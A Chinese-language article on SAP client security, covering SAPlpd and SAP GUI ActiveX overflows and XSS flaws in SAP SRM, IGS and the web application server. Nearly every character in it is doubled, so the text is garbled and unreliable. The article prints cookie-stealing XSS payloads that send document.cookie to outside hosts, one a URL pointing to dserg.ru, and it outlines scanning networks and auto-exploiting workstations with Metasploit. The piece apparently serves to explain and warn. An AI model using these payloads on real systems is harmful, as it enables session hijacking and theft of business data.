SAP客戶端安全性

1、在復(fù)雜的信信息安全處處理過程中中，最重要要的任務(wù)之之一就是業(yè)業(yè)務(wù)應(yīng)用軟軟件的安全全性。如今今，SAPP平臺 是是用得最為為廣泛的管管理企業(yè)系系統(tǒng)和存儲儲最重要的的數(shù)據(jù)的平平臺。遺憾憾的是，人人們對于SSAP的安安全性關(guān)注注卻仍顯不不足。實際際上，在SSAP系統(tǒng)統(tǒng)的各種級級別上還有有許多問 題，如網(wǎng)網(wǎng)絡(luò)級、業(yè)業(yè)務(wù)系統(tǒng)級級別、數(shù)據(jù)據(jù)庫級別、應(yīng)用程序序級別和表表示級即SSAP客戶戶端。關(guān)于于SAP服服務(wù)器安全全性的文獻獻，流傳較較多，但是是有關(guān)SAAP客戶端端安全性的的 介紹，卻卻比較少見見。實際上上，即使SSAP服務(wù)務(wù)器環(huán)境是是安全的，只只要SAPP客戶端出出現(xiàn)紕漏，那那么根據(jù)木木桶原理，整整個系

2、統(tǒng)的的安全性就就會潰于蟻蟻穴。在本文中，我我們要討論論的就是SSAP客戶戶端的安全全性問題。SAP客客戶端不僅僅可能從企企業(yè)網(wǎng)絡(luò)發(fā)發(fā)動攻擊，而而且還可能能從有權(quán)訪訪問SAPP服務(wù)器和和關(guān)鍵業(yè)務(wù)務(wù)數(shù)據(jù)的企企業(yè)網(wǎng)絡(luò)和和用戶工作作站的公共共網(wǎng)絡(luò)發(fā)動動攻擊。利用溢出漏漏洞攻擊SSAP客戶戶端SAP GGUI是一一個標(biāo)準(zhǔn)的的應(yīng)用程序序，它用來來連接SAAP并使用用有關(guān)數(shù)據(jù)據(jù)。在采用用了SAPP的大型公公司中，幾幾乎所有的的SAP客客戶端工作作站上都安安裝了這個個應(yīng)用程序序。就像其它具具有復(fù)雜結(jié)結(jié)構(gòu)的應(yīng)用用程序一樣樣，這個應(yīng)應(yīng)用程序也也存在許多多漏洞。鑒鑒于這個應(yīng)應(yīng)用程序的的流行性，在在SAPGGUI中發(fā)

3、發(fā)現(xiàn)的漏洞洞的嚴(yán)重性性堪比IEE瀏覽器 或者Miicrossoft offiice軟件件中的溢出出漏洞。WWindoows基本本設(shè)施在更更新方面還還是比較方方便的，同同時管理員員還會收到到嚴(yán)重Wiindowws漏洞的的通知，但但是SAPP客戶端的的 情況就就不同了。SAP客客戶端的安安全問題主主要有兩個個，一是客客戶端軟件件沒有自動動更新系統(tǒng)統(tǒng)，二是在在現(xiàn)有的問問題和解決決方法方面面的信息還還比較匱乏乏?？紤]到SAAP系統(tǒng)是是通過瀏覽覽器來訪問問的，所以以在SAPP Webb服務(wù)器中中存在的XXSS安全全漏洞可能能導(dǎo)致針對對SAP客客戶端的各各種攻擊，并并提高了攻攻擊SAPP客戶端的的可能性。

4、去年初，安安全專家已已經(jīng)在SAAPlpdd和SAPssprinnt組件中中發(fā)現(xiàn)了一一些緩沖區(qū)區(qū)溢出漏洞洞。組件SSAPlppd是安裝裝在每個SSAP用戶戶工作站上上的客戶 應(yīng)用程序序SAP GUI的的一部分，運運行在5115端口上上提供打印印服務(wù)。人人們在SAAPlpdd所使用的的協(xié)議中已已經(jīng)發(fā)現(xiàn)了了許多漏洞洞，這些漏漏洞允許攻攻擊者遠(yuǎn)程程控制有弱弱點的系統(tǒng)統(tǒng)，執(zhí)行 拒絕服務(wù)務(wù)攻擊，或或者停止打打印服務(wù)。這些漏洞洞的詳細(xì)情情況可以從從SAP的的正式報告告中找到。主要特點點是，有弱弱點的服務(wù)務(wù)端口默認(rèn)認(rèn)時是關(guān)閉閉的，只有有當(dāng)用戶打打印下一個個 文檔時時才打開。乍一看這個個特點提高高了攻擊用用戶工

5、作站站的難度，事事實上絕非非如此。考慮到采用用SAP的的公司，一一般SAPP用戶的數(shù)數(shù)量都是數(shù)數(shù)以百計的的，甚至數(shù)數(shù)以千計，所所以在給定定時刻有人人打印文檔檔的可能性性是非常大大的。因此此，可以編編寫一個腳腳本來掃描描網(wǎng)絡(luò)，尋尋找開放的的端口，并并在檢測到到開放端口口時啟動漏漏洞利用代代碼來迅速速得到有弱弱點的用戶戶的工作站站的管理訪訪問權(quán)限。這不僅是一一個理論設(shè)設(shè)想而已，實實際上做起起來也很簡簡單。針對對特定安全全漏洞的漏漏洞利用代代碼已經(jīng)添添加到了MMetassploiit框架中中了，而 Metaasplooit是可可以從互聯(lián)聯(lián)網(wǎng)免費下下載的。攻攻擊者需要要做的，只只是選擇一一個將在客客戶

6、端上使使用的shhell-codee，然后使使用db_autoopwn模模 塊添加加一列客戶戶工作站的的IP地址址就行了。如果SAAPlpdd的版本有有弱點，并并且用戶在在此刻啟動動了打印服服務(wù)，那么么攻擊者就就能夠得到到對該用戶戶的工作站站的訪問權(quán)權(quán)限 （如如下圖所示示）。實際際上，677%的SAAPGUII安裝都易易于受到這這種攻擊的的危害。 圖 獲取對對帶有SAAPlpdd安全漏洞洞的SAPP客戶端的的訪問權(quán)限限得到了用戶戶的工作站站命令提示示符的訪問問權(quán)限后，攻攻擊者就可可以做一些些更出格的的事情，例例如，可以以安裝特洛洛伊木馬程程序來竊取取用戶的密密碼，或者者從sappshorrtc

7、utt.inii配置文件件中讀取用用戶證書，這這樣就可以以直接訪問問SAP服服務(wù)器和關(guān)關(guān)鍵業(yè)務(wù)數(shù)數(shù)據(jù)了。SAP GGUI中的的ActiiveX漏漏洞實際上，SSAP GGUI應(yīng)用用程序還有有許多緩沖沖區(qū)溢出漏漏洞。我們們下面討論論SAP GUI應(yīng)應(yīng)用程序的的ActiiveX組組件中的一一些漏洞。SAP GUI由由大約10000個不不同的AcctiveeX組件構(gòu)構(gòu)成，而每每個ActtiveXX組件都可可能存在漏漏洞。為了利用這這類漏洞，通通常需要人人工介入：用戶必須須點擊攻擊擊者提供的的鏈接（這這些鏈接可可以通過電電子郵件、即時通訊訊工具等等等傳遞給用用戶），從從而導(dǎo)致瀏瀏覽器中 的脆弱部部件被

8、利用用，這樣受受害者的命命令提示符符的訪問權(quán)權(quán)就落入了了攻擊者手手里了。有有關(guān)數(shù)據(jù)顯顯示，一般般說來會有有10%到到50%的的用戶會點點擊攻擊者者通過社交交工程發(fā)給給 他們的的惡意鏈接接。會導(dǎo)致致溢出攻擊擊的脆弱組組件將在受受害者瀏覽覽器所在的的上下文中中執(zhí)行，如如果受害者者經(jīng)常在管管理員權(quán)限限之下啟動動瀏覽器的的話，攻擊擊者就獲得得了相應(yīng)的的權(quán) 限。第一個公開開的SAPP GUII中的AcctiveeX組件弱弱點是在22007年年發(fā)布的。同時，在在kweddit組件件中也已經(jīng)經(jīng)發(fā)現(xiàn)了一一個安全漏漏洞，此外外，在kwweditt rfcgguisiink組件件中還發(fā)現(xiàn)現(xiàn)了另一個個安全漏洞洞。成

9、功利利用這些漏漏洞后，攻攻擊者就會會得到客戶戶系統(tǒng)的遠(yuǎn)遠(yuǎn)程控制權(quán)權(quán)限。這些些漏洞已經(jīng)經(jīng)被修補過過了，詳情情可以參考考 SAPP的有關(guān)通通知。之后后，在其他他組件中也也發(fā)現(xiàn)了一一些遠(yuǎn)程溢溢出漏洞。 其中還還有一些漏漏洞仍未修修補好。2009年年6月份，又又發(fā)現(xiàn)了一一個緩沖區(qū)區(qū)溢出安全全漏洞。 Sapiirrfcc.dlll 中的這這個安全漏漏洞與發(fā)現(xiàn)現(xiàn)的其他漏漏洞一樣，也也可以用來來獲得對受受害者的工工作站的遠(yuǎn)遠(yuǎn)程控制權(quán)權(quán)限。要想利用這這個安全漏漏洞，攻擊擊者可以設(shè)設(shè)計一個HHTML頁頁面，用該該頁面來加加載有弱點點的ActtiveXX組件SAAPIrRRfc，然然后向其發(fā)發(fā)送一行大大小超過77

10、20字節(jié)節(jié)的參數(shù)來來接管它。一旦用戶點點擊了該鏈鏈接，那么么就會引起起針對用戶戶的工作站站的拒絕服服務(wù)攻擊，或或者在用戶戶的工作站站上執(zhí)行遠(yuǎn)遠(yuǎn)程代碼。在這里，您您將看到一一個會導(dǎo)致致拒絕服務(wù)務(wù)的概念性性驗證代碼碼，如圖所所示：總起來說，以以下因素增增加了該攻攻擊的危險險程度：1.在rffcguiisinkk、kweddit和WWebViiewerr3D中發(fā)發(fā)現(xiàn)的許多多漏洞都有有現(xiàn)成的攻攻擊代碼可可用，并且且許多已經(jīng)經(jīng)包含在 Metaasplooit中了了。所以攻攻擊者需要要做的只是是選擇一個個shelll-coode，找找到用戶電電子郵件地地址，然后后向其發(fā)送送含有鏈接接的電子郵郵件，其中中的

11、鏈接指指 向攻擊擊者的使用用了脆弱組組件的站點點。 從而而有可能收收到大數(shù)量量企業(yè)工作作站上的sshelll。2.在組件件sapiirrfcc.dlll中發(fā)現(xiàn)的的安全漏洞洞已經(jīng)在SSAP GGUI 77.10版版本中得到到了修補。 但是，對對于6.22和6.44版本來說說，還沒有有補丁可用用，所以建建議升級到到7.1版版本。 考考慮到目前前6.2和和6.4版版本占用戶戶工作站的的10%和和50%（版版本7.11的用戶工工作站占剩剩下的400%），所所以大部分分的公司用用戶仍然生生活在這些些攻擊的威威脅之 下下。3.除了使使用郵件或或者即時通通訊工具之之外，變通通的攻擊辦辦法是，攻攻擊者可以以在

12、企業(yè)文文檔流通系系統(tǒng)例如SSAP CCFoldders中中創(chuàng)建惡意意的htmml文檔。 在這種種情況下，人人們對該文文檔的信任任程度會明明顯高于郵郵件或者即即時通訊工工具，但是是在內(nèi)部系系統(tǒng)中上載載文檔相對對來說要更更困難一些些。利用SAPP Webb應(yīng)用程序序服務(wù)器漏漏洞攻擊SSAP客戶戶端目前，越來來越多的SSAP系統(tǒng)統(tǒng)通過weeb進行傳傳輸，像SSAP EEnterrprisse Poortall、SAPP SRMM 、SAAP CRRM 以及及許多其他他組件等等等。 一些些程序允許許通過瀏覽覽器來使用用SAP系系統(tǒng)的各種種功能，并并且SAPP應(yīng)用程序序看起來跟跟普遍的WWeb應(yīng)用用程序

13、沒什什么兩樣。然而，即即使底部的的SAP平平臺 NeetWeaaver也也是構(gòu)建于于不同的WWeb服務(wù)務(wù)之上一個個應(yīng)用程序序服務(wù)器而而已。即使使在無需額額外的組件件的默認(rèn)配配置下，SSAP NNetWeeaverr也帶有若若干漏洞。盡管這些漏漏洞都是在在Web服服務(wù)器中發(fā)發(fā)現(xiàn)的，但但是攻擊的的對象卻是是SAP客客戶端。因因此，談及及SAP客客戶端的安安全時，必必須提到在在Web應(yīng)應(yīng)用程序中中的典型客客戶端漏洞洞。關(guān)于SSAP客戶戶端，我們們關(guān)心的漏漏洞有：HTML代代碼注入漏漏洞或者存存儲式XSSS；反射式XSSS；釣魚攻擊或或身份驗證證數(shù)據(jù)攔截截；HTML代代碼注入漏漏洞以及存存儲式XSSS

14、下面讓我們們考察在應(yīng)應(yīng)用程序SSAP SSRM（該該應(yīng)用程序序用于遠(yuǎn)程程供應(yīng)商）中中的一個hhtml注注入安全漏漏洞(也稱稱為存儲式式XSS)的例子。SAP SSRM系統(tǒng)統(tǒng)允許創(chuàng)建建含有任何何數(shù)據(jù)的HHTML文文檔，并將將該文檔放放置到采購購方的Geeneraal文件夾夾中。因此此，經(jīng)過身身份驗證的的系統(tǒng)用戶戶(供應(yīng)方方）就可以以發(fā)動存 儲式XSSS攻擊。 攻擊假設(shè)設(shè)把惡意代代碼注入到到入口頁面面中。例如如，通常買買方是可以以訪問文檔檔交換文件件夾的。買買方萬一成成功查看了了這個頁面面，他的會會話證書(Cookkie)就就會被攔 截，并轉(zhuǎn)轉(zhuǎn)發(fā)給攻擊擊者的站點點。 作為一一個例子，可可以使用以以

15、下HTMML文件：docuumentt.loccatioon.hrref=httpp:/m/?+docuumentt.coookie;由于SAPP SRMM的用戶會會話沒有綁綁定IP地地址，所以以攻擊者可可以使用他他的coookie連連接到用戶戶環(huán)境，并并獲得其他他供應(yīng)商的的文檔的權(quán)權(quán)限以及管管理系統(tǒng)功功能的權(quán)限限。 這個個漏洞不是是唯一的，關(guān)關(guān)于相似的的漏洞的詳詳情可以在在官員通報報中找到。在這個通通報中描述述的漏洞允允許在入口口頁面里注注入任何HHTML和和JavaaScriipt，從從而 獲得得對其他用用戶的會話話的訪問權(quán)權(quán)限。還記得前面面介紹的SSAPGUUI AcctiveeX組件中

16、中的漏洞吧吧，如果跟跟這里的漏漏洞相結(jié)合合，就會得得到一種新新的攻擊形形式。這時時，要求加加載HTMML頁面來來調(diào)用一個個有弱點的的ActiiveX組組件。 在在這種情況況下，如果果公司的雇雇員打開了了我們的文文檔，那么么我們就能能夠訪問他他的工作站站了，從而而為我們進進一步攻擊擊企業(yè)網(wǎng)絡(luò)絡(luò)打下了基基礎(chǔ)。反射式XSSS就像前面提提到的那樣樣，甚至在在標(biāo)準(zhǔn)應(yīng)用用程序SAAP NeetWeaaver中中也存在許許多的安全全漏洞，所所以更不要要說其它的的組件了。據(jù)安全研研究人員稱稱，在各種種SAP應(yīng)應(yīng)用程序中中現(xiàn)已公布布了的安全全漏洞就有有20個左左右。 這這只是已經(jīng)經(jīng)公開的，至至于那些尚尚未公之于

17、于眾的，我我們就不得得而知了。就像前面介介紹的SAAP SRRM中的安安全漏洞一一樣，我們們將考察在在另一個應(yīng)應(yīng)用程序SSAP IIGS中的的一些安全全漏洞。對對于這些漏漏洞，攻擊擊者必須創(chuàng)創(chuàng)建一個鏈鏈接，如下下所示：http:/seerverr:401180/AADM:GGETLOOGFILLE?PAARAMSS=douucmennt.loocatiion.hhref=htttp:/dserrg.ruu/?+docuumentt.coookie;然后，攻擊擊者必須發(fā)發(fā)給受害者者并得到他他的coookie。在標(biāo)準(zhǔn)SSAP環(huán)境境和其它組組件中，像像這樣的安安全漏洞還還有很多，在在此不作一一一介紹

18、。利用XSSS“釣取”身份驗證證數(shù)據(jù)利用XSSS安全漏洞洞，還有可可能利用釣釣魚攻擊來來嗅探用戶戶的身份驗驗證數(shù)據(jù)。在SAPP Webb應(yīng)用程序序服務(wù)器中中就發(fā)現(xiàn)了了這樣的XXSS安全全漏洞，而而SAP Web應(yīng)應(yīng)用程序服服務(wù)器則是是整個SAAP系統(tǒng)的的基礎(chǔ)。之之所以出現(xiàn)現(xiàn)這個安全全漏洞，是是因為對通通過webb登錄到SSAP系統(tǒng)統(tǒng)時的URRL中用來來表示標(biāo)準(zhǔn)準(zhǔn)接口的 sap/bc/gui/ssap/iits/wwebguui/沒有有進行嚴(yán)格格的過濾所所導(dǎo)致的。這個XSSS安全漏洞洞允許在UURL中注注入JavvaScrript代代碼，用這這樣的方式式，可以把把用戶和密密碼輸入表表單之后的的內(nèi)容注入入到頁面的的源代碼中中。所以， 它實際是是注入了修修